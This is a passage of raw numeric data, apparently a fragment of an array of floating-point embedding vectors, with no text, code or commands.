1727,-0.0011931453,0.006023996,-0.00044938692,-0.0247742,0.006120171,-0.015975198,-0.023432704,0.019862328,0.020527339,0.030736579,-0.006415018,0.0011311839,-0.037682083,-0.017746257,-0.002612025,-0.0005088413,0.025944369,0.0074688527,0.008380024,0.0025246553,0.009211961,-0.008867374,-0.003061438],[0.0029559731,-0.007591475,0.003443279,-0.016813274,0.0076365834,-0.02442055,-0.026144257,0.013758216,0.007982208,0.0066538895,-0.007457036,0.018595671,-0.020074451,0.004897058,-0.007274708,-0.0033339022,0.012492667,-0.0028082442,0.024997106,-0.018933965,0.004793677,-0.014020816,0.013566424,-0.0106929885,0.0059847473,0.022476496,0.0062369257,0.0062892465,0.0052941903,0.0003663353,0.008446722,0.014098283,-0.010312355,-0.009647797,0.009401802,0.006141223,0.007966614,0.0013925821,0.0035647268,-0.001259372,-0.012969561,0.0032918018,-0.032278467,0.014778649,-0.005095172,-0.017975224,0.006326503,0.0006105051,-0.031483047,-0.011000798,-0.0005910598,0.01271001,-0.0004126895,0.014890841,-0.0006086826,0.0002248921,-0.017646234,-0.02607837,0.027232282,0.009609349,-0.012248888,0.015129744,-0.010376542,0.001176552,-0.009953896,-0.023106676,-0.0063739317,0.0067973463,0.0030840714,-0.009978526,0.057110373,0.015254766,0.007922766,-0.005729531,-0.020715358,0.017612336,0.016835067,-0.017267281,0.009513754,-0.017698335,-0.0047182045,-0.0073328307,0.015541894,-0.024082648,-0.021733196,0.012001129,-0.0038252498,-0.016899617,0.0014763059,0.009932291,0.011787905,-0.0145784505,-0.0018143766,0.008777707,0.0056847846,0.016807448,0.013751266,0.012700574,-0.0049562245,0.0018291547,0.010818526,-0.001970261,-0.011499289,0.007584684,0.008867939,-0.012655851,-0.0035647443,-0.0102529535,-0.0060484624,0.0043256828,-0.019979086,0.011940132,0.013987032,-0.008163528,0.019367293,-0.015227099,0.0006743549,0.0065321475,-0.019484658,-0.009156008,0.0032211454,-0.015447674,0.019859448,-0.015321845,-0.017306296,0.0019163714,-0.011878517,0.009231888,-0.009798608,-0.01482552,-0.018173622,0.019238813,-0.010906438,0.010976085,-0.006752639,-0.001392441,-0.00278611,0.000913304,-0.0057742572,-0.017094288,0.012305645,0.011983337,0.045207012,0.017287359,0.0049532657,0.006831887,0.0059566232,0.0031739739,0.018097606,-0.005209065,-0.001376896,-0.005301907,0.006431209,-0.008820698,0.007028583,-0.015195032,-0.0039959373,0.0037367665,0.008453363,0.013509912,0.01818145,-0.0071861595,-0.024513246,0.030975169,-0.0004006979,0.008509983,-0.009950257,0.004798802,-0.0037974103,-0.019797595,-0.008710281,0.039982088,-0.00601091,-0.0038131669,-0.0044481163,-0.015798029,0.0015263726,-0.0006128087,0.018046929,0.01685209,-0.0014622537,0.03005691,0.018905185,0.009981531,0.00984777,0.0129308505,0.0006925182,0.009167607,-0.021479776,0.009044906,-0.0011342006,-0.0177816,-0.0050608637,0.0056519904,-0.0068737734,0.014805074,-0.018351313,0.07725218,-0.014250931,0.0003816142,-0.006611724,0.00334081,0.004904944,-0.018346533,-0.03171661,0.0045288736,-0.023202758,0.011127659,0.0053938464,-0.0060934266,0.013158381,-0.006783714,0.024223244,0.0019151809,-0.004931203,-0.091662,0.025486462,0.02397559,0.0038784256,-0.00025166277,0.0130540375,0.0046853647,-0.02570495,-0.016134404,0.002614324,0.009174806,-0.0011964333,-0.0011519658,0.0016466768,-0.019591944,0.015998287,0.015849888,-0.009112074,-0.013925995,-0.008425048,-0.039962005,-0.011952736,0.008685285,-0.0025941182,-0.00072790193,-0.023791974,0.009484624,0.014742832,-0.010773457,-0.0074063865,0.007261402,0.00254844,-0.00046590902,0.011064065,-0.013231785,-0.023578668,0.0015177139,0.009045672,0.013071686,0.00044608032,-0.02086869,-0.0074439966,0.0014847384,0.007507435,-0.0022578773,0.008152972,0.025029564,-0.017325424,-0.007230104,0.012696065,-0.005216208,-0.017732678,-0.039539672,0.003613621,-0.018562453,-0.009942861,0.00901985,0.02236592,-0.023475258,0.012738558,0.018641654,0.01850309,0.0065973266,0.013772277,-0.02105797,-0.0043879584,-0.013358508,-0.008632566,-0.012968608,-0.01312513,0.006647734,0.022115668,0.003283221,0.009585808,-0.01636591,-0.0033066324,0.0277633,0.032471307,0.008812865,-0.0032066028,-0.02402161,-0.03607192,0.01700528,0.012680388,0.006580163,-0.0048785247,-0.004015857,0.01165876,-0.015619189,0.02905386,-0.0029913664,0.0019115866,0.0046277186,0.019248735,0.005975771,-0.0037561008,-0.009242922,0.011870151,-0.0059278077,0.020534126,0.009299453,0.015042306,-0.011665127,-0.0013736103,0.024803374,0.00083604,0.0062096184,-0.033210758,0.008602599,0.004601886,-0.01572257,0.02432991,0.00094335515,-0.003768201,0.004674668,0.01221203,-0.005651503,0.011542485,0.02401726,-0.030475872,0.0117092645,0.0059544356,0.005315898,0.013884252,0.046037737,-0.010835716,-0.0020851584,-0.0050741956,0.017660594,-0.0035448452,-0.012820835,-0.020756543,-0.006805601,0.012369398,0.008122771,0.0030797888,-0.010021718,-0.016368015,-0.0045341854,-0.0140832495,0.0081695495,-0.0021048759,-0.0010845666,0.0016000113,-0.005378534,0.026144221,0.007909837,0.032975618,-0.0067837867,0.04697012,0.0065648207,-0.02103194,0.012404398,-0.011345192,-0.023552543,0.015016519,0.019341508,0.002896003,-0.0066827163,-0.021990156,-0.016382096,-0.011915817,0.017939962,0.0054373425,0.00034521127,-0.024308652,0.007904937,-0.012466535,-0.028844874,0.02971234,0.0134691745,-0.01703691,0.021033213,0.033309635,0.01599891,-0.0033501487,0.011570592,0.0038037172,-0.009725972,-0.023559129,-0.004353098,0.0048773205,-0.01502559,-0.02272792,0.016139371,0.00815412,-0.004423355,0.00787601,0.0120115485,-0.011516389,-0.019248262,-0.008930208,-0.013881458,-0.020213995,0.0044761146,0.025328685,-0.015076388,0.005316532,-0.0009736289,-0.0020921559,0.0051544835,-0.01767814,0.01927137,-0.017280295,0.0011269702,0.0079179155,-0.0057830475,-0.004011091,0.018640734,0.029981738,0.02763499,-0.017444964,0.047261056,0.023313802,0.02670579,0.005975175,-0.014307452,-0.022633433,-0.0004677998,0.018681947,0.03214339,0.0036472112,-0.0042322045,0.008204172,0.009002257,-0.005479043,-0.0023427748,-0.005203968,0.01954204,0.0055419416,0.010983219,0.004125339,0.013515891,-0.0029801694,-0.0034097696,-0.0006441234,-0.0028827882,0.016797774,-0.00891125,0.021017345,0.01590265,0.031433467,-0.017129207,0.005912906,-0.0146197025,0.0009478437,-0.03292645,-0.0060933637,0.017005842,-0.014635067,0.00878384,-0.007442178,-0.00769284,0.008095674,-0.0040633082,-0.027524492,-0.025677262,0.00037113394,0.014709613,-0.0074970853,-0.0023273241,-0.02482407,0.0092998855,-0.0044953004,-0.0083250385,0.008271525,0.0071518295,-0.017223261,0.014761003,0.013750983,0.01339299,0.0037351658,0.02071257,-0.011253513,0.024381299,-0.019651322,0.029098136,0.0010825231,0.02423388,0.010560804,-0.0030727459,0.012311831,-0.03464975,-0.008388495,-0.009764489,0.020881543,-0.03917562,0.01966804,-0.0035930162,-0.013504123,-0.010124194,0.018462792,0.008976592,-0.00526796,0.023776857,0.008340061,-0.005704998,0.033694074,0.000060693794,0.002720136,-0.016013674,0.006057488,-0.020795362,0.0028516678,-0.0006051831,0.005373359,-0.025102384,-0.025584225,-0.0039085373,0.028726617,-0.031455565,0.01135267,0.0056872773,-0.006987705,0.010477854,0.016120322,0.08662692,-0.0059171654,-0.010959157,0.023698734,0.043091666,0.00089040207,0.015503296,0.013338682,-0.007609999,-0.023267923,0.011801762,-0.005319998,0.013614369,0.008340697,-0.008148997,-0.007491718,0.005441844,-0.0138974255,-0.020323377,-0.0010415891,-0.010686209,0.014921379,-0.020142702,-0.030813992,-0.008570137,0.013589405,0.014030722,0.014698305,0.02259175,-0.0049770866,-0.023329722,0.006983084,0.0026128136,-0.002575642,0.0031341505,0.013000781,0.0030385896,0.015059662,-0.002249905,0.015062937,0.00359505,0.005641358,0.021012353,0.027688997,0.026128134,-0.0037882084,-0.04760113,0.012908803,0.0015654435,-0.028923178,-0.024642345,-0.010846864,-0.0030323952,0.0031463597,-0.01994237,-0.010850262,0.02033019,0.01975084,-0.033441458,0.01414726,-0.00091646455,-0.0023044895,0.008793803,-0.017693099,0.010974803,0.016815364,0.0013475368,0.0018806095,-0.0050321836,-0.017961131,0.0039048905,0.014420505,0.0081199845,0.009109395,-0.00398058,0.023451846,0.009613737,0.027560497,0.02385469,-0.0035556573,0.0058377027,0.00072817144,0.00097022124,0.0018297462,0.0014138735,-0.007514069,-0.0048464932,0.025963515,-0.011009181,-0.03464211,0.005883053,0.006171851,0.0040566786,0.0022179172,-0.0019279472,0.02068018,0.0009134519,-0.0076060235,0.0009826963,-0.0038635232,-0.005155813,-0.04231508,-0.0076499535,0.024617482,-0.006040325,0.019829854,0.018391026,0.021696808,-0.0021811733,-0.0046048486,-0.0011939518,-0.0595168,0.0036777777,0.009000536,0.022076556,-0.008669588,0.03593739,-0.027096333,0.005874816,0.021150945,0.0073462795,0.0054979506,-0.0006518603,-0.001829306,0.0128186,0.014666422,0.009051707,-0.011108903,-0.031969786,-0.01533955,-0.049472023,0.023495782,0.0066563487,-0.005771162,0.0068368013,-0.012190361,0.03467696,0.0075882636,0.002502694,-0.008394935,0.0005535746,-0.008307919,0.0042506536,-0.0024976793,-0.008079456,-0.016926713,-0.025205951,-0.01553634,0.031851675,-0.003000113,0.008318059,0.03616959,0.007483949,-0.01265729,-0.007733758,-0.00553298,-0.003906517,-0.017225632,0.013339892,-0.018233709,0.030125512,-0.011926586,0.009293125,0.009285812,0.0038642907,0.007662945,-0.0026282824,0.0077650445,0.018942965,0.0058774534,-0.0040925047,-0.013358963,0.0066078487,0.0042609936,-0.013885107,0.007297503,0.006064318,0.0102511905,0.0006044174,-0.00501259,0.006361703,-0.0140404515,0.03242199,0.012270012,0.0040030777,-0.0041239513,0.0012961349,0.010362698,0.020147035,-0.0041147727,0.008971346,0.025342502,-0.01527707,-0.030172013,0.0038919463,-0.004586946,-0.009510318,0.00610275,0.013068583,-0.000019974555,-0.01007324,-0.014854468,0.0059611476,-0.03602323,0.012823954,0.004375348,-0.014184003,-0.036855098,-0.04165876,-0.00013377903,0.018819109,0.020648617,-0.0268679,-0.020586452,-0.038283996,-0.023031022,0.0067172498,-0.048640527,-0.031040242,-0.0004687703,0.008896146,0.010322313,0.006153336,0.0043594106,0.012352514,0.014592554,0.03157338,-0.008587689,0.014474757,-0.0014095645,-0.013058944,0.02130836,0.014236421,-0.011311093,-0.011375518,0.008994916,0.008940617,-0.024442535,-0.020785598,0.011614577,0.04913176,0.02998601,-0.0016395196,-0.02278464,0.010405576,0.0064464877,-0.0066151647,0.014108548,-0.034936793,-0.024786994,0.0103433,0.013570557,0.015202705,-0.01055017,-0.009775435,0.013465006,-0.014404095,0.015312821,-0.007195533,0.00011224845,0.019677777,0.00018375868,0.019754624,-0.018884404,-0.016893797,-0.010502093,0.019565225,0.0069216434,0.007485906,-0.0152956275,-0.01704693,-0.005441985,0.012369118,0.010065122,-0.01485268,0.010465807,-0.0024432072,-0.047190677,0.027042955,-0.00045517922,0.0022483806,0.002961515,0.0037492968,0.0014398898,-0.02243457,-0.003779949,-0.002238138,-0.024194838,0.017257603,-0.015760291,-0.019476706,0.002203469,-0.0060086707,-0.016226485,0.012528163,-0.003764393,0.024731336,0.012555386,0.009369037,-0.014922385,-0.006398431,-0.008290645,0.019033916,0.0028562478,-0.030416869,-0.0029287974,0.0050423467,-0.0019272268,0.033542138,-0.001467634,-0.0102817565,0.03242745,-0.0104154125,-0.0126043055,0.0189329,0.0037697982,-0.0122944275,-0.005404283,-0.0017052331,-0.0056941225,-0.004342833,0.013809594,0.007908077,0.024295105,0.0065482757,0.005653011,0.009185367,0.0028475726,0.017387187,-0.011157562,-0.00036750134,0.020156067,-0.024520911,-0.014472383,0.0050743087,0.0026343195,-0.00017192862,0.015757892,0.031655654,0.0044712806,0.006685608,-0.004569328,-0.0066821016,0.0010825654,-0.029940177,0.01119143,-0.012084993,0.00087980984,0.00030015374,-0.009835016,0.033025768,0.0048660915,0.009710305,0.000052356234,0.013092007,0.012031516,0.004703835,-0.0050560157,0.002996904,-0.014336366,-0.020073028,0.0049342643,-0.044564057,0.00435969,-0.010392492,0.0035544746,0.021094311,-0.0067890175,-0.006851565,0.0053984444,-0.019099912,0.019713823,-0.0004443106,0.01549641,-0.008203144,0.027639173,0.011001742,-0.0026654755,-0.0090182675,-0.0025277105,0.020065775,0.00060020515,0.0074145934,-0.009415592,0.021433506,0.011586482,-0.009500337,0.008332801,-0.017149216,0.020714238,-0.009595613,-0.01148375,0.014550601,0.018867254,-0.018406756,-0.002147228,-0.04351491,0.0054094424,0.03388245,-0.004112573,0.0143844765,-0.009719425,0.009965309,-0.0038277793,-0.022437235,0.006907124,0.017845644,-0.03424855,0.023873558,0.024664598,-0.0032409967,0.012486433,-0.015232143,0.0065673543,-0.0062509086,0.035196222,-0.0046861507,0.008532987,0.0075437333,-0.01383404,-0.017240005,-0.011230727,-0.008259441,-0.04297907,0.01295578,-0.015226335,-0.0033491845,0.0053530755,0.0080096815,-0.023102006,-0.018685753,0.011563713,-0.01645598,0.010644602,0.0023966422,0.0061713997,-0.0013118488,0.02151854,0.017745115,0.0125799915,0.0068929954,0.00859573,-0.014385015,0.007406867,-0.0056824796,-0.011812846,-0.0044722897,-0.013504261,0.030804612,-0.005339851,0.026687246,-0.012910925,-0.020989979,-0.0112986,-0.0016822984,-0.015229569,-0.0039623883,-0.0072455034,-0.019977272,-0.007750222,0.041282672,0.0045300727,-0.006338546,-0.00854816,-0.0013627998,-0.02097255,0.0003188016,-0.003991244,-0.007024926,0.0010710371,0.023428807,-0.017366743,-0.0077165565,0.01074461,-0.010466563,-0.003915232,0.004656666,-0.01021547,-0.013228552,-0.019107228,0.011639146,-0.008546098,0.009801546,0.017299468,-0.011962697,-0.0025112987,-0.003434147,0.0129887,0.0010188249,0.005292666,0.02006859,-0.027053688,0.020446526,-0.0064183357,0.009783395,0.012571602,-0.027951462,0.016951257,-0.01763803,0.01457424,0.020563979,-0.022478487,0.017860178,-0.0048903413,0.021671386,0.000053703086,0.00004066104,0.01397538,-0.0014892039,-0.03266319,0.016363276,-0.005708174,0.00077446003,0.0060959784,-0.03868171,0.006050265,0.016586225,-0.0025292407,-0.020004297,0.0036948489,0.0027308206,0.00093369733,-0.0026369386,-0.012475879,0.015812054,0.0700116,-0.010643649,-0.01860737,-0.026586646,0.0142935235,-0.0054281605,0.006038863,-0.018188335,0.013179872,0.006775818,-0.010063042,0.024120234,-0.011384916,0.0038875819,-0.020023039,-0.027773397,0.011319866,-0.003907549,-0.022703923,0.0071791597,-0.01733458,0.009818441,0.0031275458,-0.023925858,-0.04194312,0.010881526,-0.019774355,0.001745487,0.0034522573,0.008161574,0.0010761024,0.017020514,0.008082753,-0.021359231,-0.005001958,-0.0070955288,-0.02750054,0.028492235,0.016484236,-0.024336223,0.0010727455,0.011462009,-0.027795415,-0.018782478,-0.004146816,0.016408624,-0.007230047,-0.026514897,-0.012050309,0.0104689365,-0.0053568184,-0.014241505,0.010961074,0.009470359,0.00053352496,0.022398492,0.03420741,0.005548696,0.029793805,-0.011038645,-0.017238291,0.014822634,0.020490067,0.002487393,0.0027972204,0.02651476,0.019255344,-0.021591129,0.00670551,0.017061397,-0.00900554,-0.028185958,0.010261947,0.018416446,-0.015894191,0.005496405,-0.023185192,0.002600386,-0.011096653,0.0013559145,-0.026727894,0.02980375,-0.034395926,0.0040169363,0.003079494,-0.029319763,-0.009864372,0.015147818,0.02763815,0.0028164892,0.0022629716,-0.0073676733,-0.009187077,-0.0142248245,-0.021144079,0.0032474813,-0.014313144,-0.010828288,-0.0062407316,-0.013006704,0.03573027,-0.040774066,0.015136315,0.012064125,-0.005815738,-0.012328947,-0.01451511,0.005631415,0.0051829913,-0.012600981,-0.010187504,0.008499233,0.02606491,-0.020415949,0.02199491,-0.014046171,-0.012067484,0.008166197,0.008360296,-0.008876106,-0.003606881,-0.036354702,-0.0006870775,0.0006282124,-0.016290052,0.020805243,0.013311119,0.023998305,0.013722288,-0.017347893,-0.009956587,0.023920251,-0.014979069,0.015025958,-0.011496565,-0.008557263,-0.024038345,-0.014990631,-0.010434498,-0.018595938,0.0009419331,-0.0052941474,0.012969038,-0.027650576,0.008251869,-0.010005652,0.019032132,0.0052069006,0.012898088,0.021828106,-0.008369238,-0.014030091,-0.01454651,0.0045197904,0.018936966,-0.010137259,-0.015619876,-0.021319985,0.0019126405,-0.0034719259,0.005957697,0.020950839,0.014730361,-0.0045572375,0.01630757,-0.022858467,0.015469178,0.019298049,0.007246166,-0.02441384,0.030819973,0.0023842903,-0.012308351,0.018246925,0.0023702814,0.03186006,0.015146375,0.012187642,0.005065942,-0.005868138,0.019773897,-0.014412003,0.05653042,-0.02265494,-0.0048339907,-0.01909462,0.0011934703,-0.0021746815,-0.016608099,0.023745632,0.02166973,-0.004856972,-0.037364107,-0.019475985,0.0005362775,-0.025507368,0.02892744,0.018093795,0.011340229,-0.002532965,0.0010179434,0.003987285,0.018426582,0.008772225,0.009620488,0.035502166,0.008980157,0.030125605,0.0017572326,0.021839919,-0.0058386936,0.005449122,0.0090004755,-0.010396152,-0.015506559,0.010129795,0.012873007,0.015046631,0.030419715,-0.021627618,0.0010495103,0.006396283,0.01677876,-0.025261069,0.075474076,-0.0049502663,0.007729339,-0.0015699061,-0.014250487,0.0069961683,0.014752139,-0.006130751,0.031212302,0.013056587,0.00042711812,-0.016765144,0.026592065,0.0020927712,0.007604076,0.009537228,0.019912632,0.009624392,0.010973126,0.014599693,-0.016585127,0.018718323,0.0018529706,-0.0103507945,0.0014781727,-0.017315894,-0.0036479887,-0.011509062,-0.012644085,0.00029734088,0.0048551136,-0.028335234,0.023433058,0.015802559,0.037247505,-0.011697569,-0.004657271,0.013617407,0.008615894,-0.0044445996,0.021312503,-0.0016425404,0.0035050532,0.0030055686,0.019930867,-0.003654932,0.09243196,0.028526759,0.02572822,-0.019357987,-0.002191066,0.025931953,-0.023372965,0.017191749,0.004195312,0.002804602,0.013504967,0.020673221,-0.014416353,-0.000729412,0.0117940875,-0.010573676,-0.009651481,0.026149558,0.0055118604,-0.0062610786,0.0027417499,0.010339325,0.003007785,-0.016321905,-0.012446594,-0.008908132,0.0021079949,0.00927812,0.033105258,-0.014458349,-0.0043237316,0.017361104,0.005756049,0.041546836,-0.016999133,-0.0789095,-0.0075425403,0.13476053,-0.01623098,0.020468276,-0.0034341929,0.00030259232,0.00435482,-0.054730352,-0.0318264,0.006466663,-0.0007680053,-0.0035027794,-0.026841093,-0.013611234,0.019038929,0.0047569433,0.007250395,0.0021650074,-0.04585215,0.019726567,-0.017218908,0.01203598,-0.017191919,0.012853794,-0.011081724,-0.0053568264,-0.0011548648,0.017453276,0.0009353394,-0.012592959,0.016948646,-0.015664585,-0.0023126975,-0.009937278,0.004448901,-0.005174281,0.0130308615,0.01567398,0.028677536,0.0008932064,-0.014681706,0.015185667,-0.00053083245,-0.011589879,-0.016442116,-0.14884393,0.0030809483,0.038024716,-0.057057302,0.012666998,0.008980652,0.007876868,-0.012666523,0.0018668692,-0.048896234,0.0067071556,-0.027468767,0.012366005,0.010030237,-0.013981807,-0.007944801,-0.008422076,0.00006146728,0.011055871,0.011317865,0.017014666,0.0069281035,-0.000353548,-0.0036570658,0.010139523,-0.0011114088,-0.017565932,-0.008120969,-0.031155592,0.024273805,-0.017129146,0.013956898,-0.004529359,-0.01375046,-0.039713107,-0.025434202,-0.01566592,0.01783092,-0.0067924983,-0.0049440474,0.002995804,-0.023608439,0.005941907,-0.016820528,-0.0055506295,0.015768118,0.0023528838,0.009763763,0.0028685164,0.0073712044,0.045025837,0.0029447943,-0.021901522,0.0017545394,-0.005086153,-0.001807405,-0.011094072,0.0051006987,0.0008783478,0.0008291585,-0.022766963,-0.016851459,-0.010295721,-0.013074744,0.00770125,-0.014756944,-0.013417136,-0.014843225,0.005415561,0.0048514935,-0.004047914,0.013052906,0.014294082,-0.024120841,0.032046888,0.030834196,-0.01821897,0.037538957,-0.016798554,-0.021279102,-0.00040160108,-0.00077833986,0.012495747,-0.02378415,-0.024667721,-0.008390476,0.008645969,-0.005453534,-0.0029476287,-0.027532013,0.011120253,0.02086459,0.024455568,0.0066775274,-0.028293552,0.021775788,0.018959204,0.00984764,-0.029505098,0.01700169,-0.016501928,-0.0014691688,-0.027704364,0.0020153732,-0.013814038,-0.0010534718,-0.023836512,-0.031058658,-0.032990597,0.013119777,-0.007853102,0.011908185,0.000566073,-0.027911253,-0.01830688,-0.026314786,0.0196791,-0.0011802106,0.00960466,0.004323557,-0.022902984,-0.025766572,0.0038258133,0.003902567,0.032322813,-0.017763695,-0.02917373,0.0023242224,-0.0044066207,-0.05658544,-0.017459532,0.0018530824,-0.003343931,0.014018212,-0.0005153001,-0.003987807,0.0011277942,-0.009391413,-0.020090614,0.025865465,0.00076378207,-0.0108743,-0.0007483917,-0.012543423,0.02267195,-0.0023791457,0.024593733,0.0004348161,0.03097808,-0.0003806736,-0.018437928,0.03139342,0.017738948,-0.02776225,-0.011975719,0.073352925,-0.018675,-0.02828231,0.014242159,-0.0019837278,0.0014062275,0.020771671,-0.0072818543,0.009934081,-0.005458778,-0.04264377,-0.012017256,-0.007919296,-0.0038150658,-0.0077299294,0.0039080842,-0.00007376561,0.014060481,-0.00015626116,-0.009926539,0.020236246,-0.003738905,-0.011549873,0.05964681,0.028606176,-0.0073368927,-0.006201644,-0.0045710662,-0.011351688,-0.002495308,-0.021641113,-0.007577092,-0.0058936765,-0.010999403,0.013618969,-0.050989103,-0.013807117,-0.010608529,0.02285062,0.002135624,0.005294027,0.01060314,0.01685609,-0.017803289,0.019424034,0.026805812,-0.015503927,0.013779694,-0.00758072,0.001221153,-0.013272928,0.0059393034,-0.015802756,-0.03714824,0.009476947,-0.027256532,0.013555993,0.0070411717,0.005762881,-0.00420204,-0.0019924657,-0.009052023,0.010338614,0.009078914,0.006366465,0.0026349036,0.024982756,0.0096982485,0.019688696,0.023103982,-0.011609573,0.009763652,0.0120313205,0.03544392,-0.0046427827,-0.013895716,-0.021775216,0.014975798,-0.0038962306,0.012688363,0.011956529,0.008322716,0.009926667,-0.0013599253,-0.039889112,-0.06483229,0.022262951,0.008239854,-0.028504774,0.018444581,0.0074726,0.0059878957,0.017730484,0.0005663291,0.0008545953,-0.013668245,-0.0070421635,0.00770226,0.0069732163,0.011109536,0.018556893,0.019624013,-0.01237972,-0.014287842,-0.0008632213,-0.017196499,-0.017531196,-0.025724124,0.015550436,-0.025722768,-0.013349834,-0.012031793,0.016958348,-0.014091763,0.01134306,0.013124614,-0.025493914,0.004722231,-0.0006461551,-0.015192308,-0.0023862552,-0.014924217,0.0014576366,-0.018002892,0.04971525,-0.009301617,-0.012669217,0.014582805,-0.016637268,-0.0019000717,0.0010663007,0.01938981,-0.0140468525,-0.0027442514,-0.006530332,-0.016101312,0.004316331,0.016723828,0.01112349,0.024651721,0.002545316,0.009909872,-0.018353375,-0.0127323475,-0.0048175105,0.0039006732,-0.0018323058,0.0065701217,-0.0074984683,0.012347435,-0.01881314,-0.022554312,0.0026991593,-0.014237616,0.0073270355,0.024055231,-0.029609503,-0.006818457,0.0011175617,-0.0075244135,-0.020991405,0.012257532,0.016350897,-0.011605037,-0.009346772,0.021226762,0.01340906,-0.006368392,0.036068052,0.0025333855,0.0052664187,-0.030317182,0.004182962,0.029826421,-0.008321773,0.03190999,0.021678297,-0.02256443,-0.01084958,0.021622118,0.00455147,0.0027803818,-0.016746901,-0.022578878,0.032003906,-0.024981325,0.009726489,0.027501088,-0.00033605588,-0.016368128,-0.005028664,-0.0020183038,0.0104466155,-0.033313267,-0.008866475,-0.0030245222,0.0011075272,-0.023165362,0.024422057,0.0022041774,0.0031699392,0.033123914,-0.010474456,-0.027097043,0.014053341,-0.0065232026,-0.009738962,-0.013319049,-0.030467482,0.019401848,-0.0048325453,-0.0038800603,-0.010783459,-0.012440699,0.014100824,0.0052833552,0.0098170275,0.0030763436,-0.018424643,-0.022122286,0.0073508266,0.008083811,-0.004509418,-0.0042583775,-0.031812727,-0.0098602185,-0.029025884,0.05642478,-0.001672943,0.008594803,0.022868244,0.037875213,0.003188063,-0.00063059106,0.008002862,-0.01715426,-0.0015374717,-0.015233669,-0.014098636,0.012025775,0.01137235,-0.00354235,-0.009908395,-0.01737966,0.00369994,-0.020089783,-0.006728686,-0.009801374,0.00035094764,0.00074632093,0.009467369,-0.01956994,-0.016907334,-0.024033537,0.0011673205,-0.012392798,0.009884708,-0.012981598,-0.017017001,-0.009901957,-0.020079484,-0.010388654,0.0009016717,0.014184954,0.0072351694,-0.00541962,0.015393666,-0.0012281807,-0.0053534056,0.0044586402,-0.020860765,-0.001731722,-0.003258229,0.0018660919,-0.01891828,-0.0061907815,0.01988696,0.006709747,0.0019288062,-0.01417767,-0.0018794265,0.028505472,0.024287226,0.0038082658,-0.0036116443,-0.0061054854,0.0103723565,-0.021365497,-0.021708647,0.0047836713,-0.016143356,0.013802897,0.001699184,-0.0074027353,-0.027141051,-0.022487668,0.0033517,-0.009515435,0.031904064,0.0048441524,-0.01898168,0.004682929,-0.009038349,0.0017465567,-0.008152119,-0.0022886507,0.0039965403,-0.02942901,0.019438282,-0.023948798,0.018627502,-0.018008392,0.022736153,-0.01175563,-0.0048117917,0.0017186613,-0.011273903,-0.005881742,0.013406306,-0.011038881,-0.0043422487,-0.020060986,0.0015318015,0.008627997,0.005882541,-0.00081969175,-0.030538926,0.014472569,0.0069664996,0.0026347197,-0.0002565197,-0.017610481,-0.000892021,-0.172115,0.0034293837,-0.0059722736,-0.036012318,-0.018551478,-0.0041267374,0.0033819377,0.062131148,-0.0008970421,-0.029531302,0.013302833,0.022590902,0.033942506,-0.0071794796,-0.0056297746,0.019200604,-0.008732636,-0.010094633,0.022848206,0.0022909006,-0.0040446315,0.027466299,0.011619788,0.003412059,-0.0026839545,0.036098618,0.008587674,0.011187157,0.006653285,0.012843457,-0.0013206962,-0.004162481,0.009707842,-0.006365457,-0.016623646,0.03198785,0.0044359374,0.014336108,-0.009140423,0.0029692235,-0.00538873,-0.032764245,0.010859779,0.034137197,-0.00763066,0.0070161805,0.017572356,-0.005351208,0.007745945,-0.025130816,0.009252967,-0.021250518,0.033248216,0.008803345,-0.0065865368,0.006078926,-0.039848898,0.00958741,0.0005998269,-0.023398984,0.011660907,0.031813405,0.0005689662,-0.016917767,-0.02896596,-0.0094224615,0.01777088,-0.005043809,-0.011621071,0.0025039678,-0.010463536,0.0052164244,-0.0065939827,-0.010131027,-0.018037507,-0.003065512,-0.011217847,0.0124906115,0.008811023,0.0049184095,0.006945031,0.017962534,0.0013727195,0.037802476,-0.012430853,0.015630465,0.0041344613,0.015307203,-0.007202894,-0.009451159,0.03234327,-0.014341805,-0.01729718,-0.020831326,-0.016786426,0.005694064,-0.006945179,0.031245355,0.029454855,0.0025220937,-0.004437111,-0.004836591,-0.011270179,0.0065540695,-0.10384132,0.0030759799,0.030061103,-0.0050127036,-0.019392487,-0.004816557,0.027222214,0.00819201,0.025298657,0.0038321519,-0.018793235,0.014448934,0.016228952,-0.008295339,-0.0063344603,0.021322506,-0.042215783,0.01463478,-0.01086338,-0.007750489,0.01959824,-0.025626775,-0.029642157,-0.0023007009,0.016129084,-0.0038020345,-0.019136362,0.011785149,0.032786995,-0.00888801,-0.012300567,-0.007589307,-0.00016068753,0.035373587,-0.029317012,-0.034975607,0.014598257,-0.0024094705,0.019293211,0.014787732,0.008269871,-0.014100776,0.015504384,0.012954353,-0.011741282,0.010892246,-0.011095279,-0.0040348214,0.025970481,-0.0006115135,0.0039280425,0.028887639,0.007909872,-0.001445366,0.0013060939,-0.017155005,-0.003564242,-0.0080556655,-0.02864355,0.01958472,-0.0185829,0.02132379,0.0027788943,0.0014170585,0.005936053,0.013121052,0.01240989,-0.022058783,0.0049810954,-0.0062952866,-0.0132016195,0.011000521,0.02967661,-0.0035170058,0.038065124,0.026212683,0.0069419695,0.012919285,0.0012506768,0.0035842038,-0.016589992,-0.008500014,-0.017995602,0.01908919,-0.016910996,0.0029928675,0.00057119556,0.02377762,-0.014503523,0.03687226,0.00984725,0.035202324,-0.028597992,-0.009042115,0.015379202,0.023893757,0.017217055,0.0038968145,-0.011363331,-0.0012121799,-0.03446515,-0.015905851,0.004829732,0.0019662166,-0.016954912,-0.000028085144,-0.011877516,-0.018289374,-0.016538039,0.020482989,0.015935382,0.035230257,-0.02858092,0.017044472,-0.037974194,0.0034345756,-0.0074729035,-0.007012248,-0.010251618,0.007928373,0.007311826,0.01564338,0.002069441,-0.0067643663,-0.009202093,0.013400777,-0.021202387,0.010528831,0.020909581,-0.0011826986,0.0032539961,-0.011894783,0.0047777686,-0.04712203,0.019465283,-0.0058469954,-0.0003214922,0.0035206089,-0.0101025915,0.0049382835,0.006194899,-0.0070953765,-0.0019603285,-0.004447502,-0.008069662,-0.014235681,-0.0008538613,-0.007673726,-0.005712474,0.01105486,0.0018633908,-0.0004843361,-0.00055862224,-0.012449765,-0.03669312,0.0013153619,-0.018219015,-0.007280954,0.0002772846,-0.01962378,0.0023123515,0.0056052743,0.0053373324,-0.010652007,0.024469946,0.0030909905,0.0069907364,-0.001510642,-0.00905651,0.009189088,0.0040938696,-0.0076134447,0.004367683,-0.004763006,0.01438302,0.029123759,0.028692653,0.025765967,0.005234105,0.011903401,0.028694073,0.011898172,-0.015568692,-0.0055886214,0.007962878,-0.0045697764,0.0047261105,0.019833932,0.017487325,0.0055264486,0.008099026,-0.00002987072,-0.005575978,0.008517209,-0.009417895,-0.00906825,-0.0045174262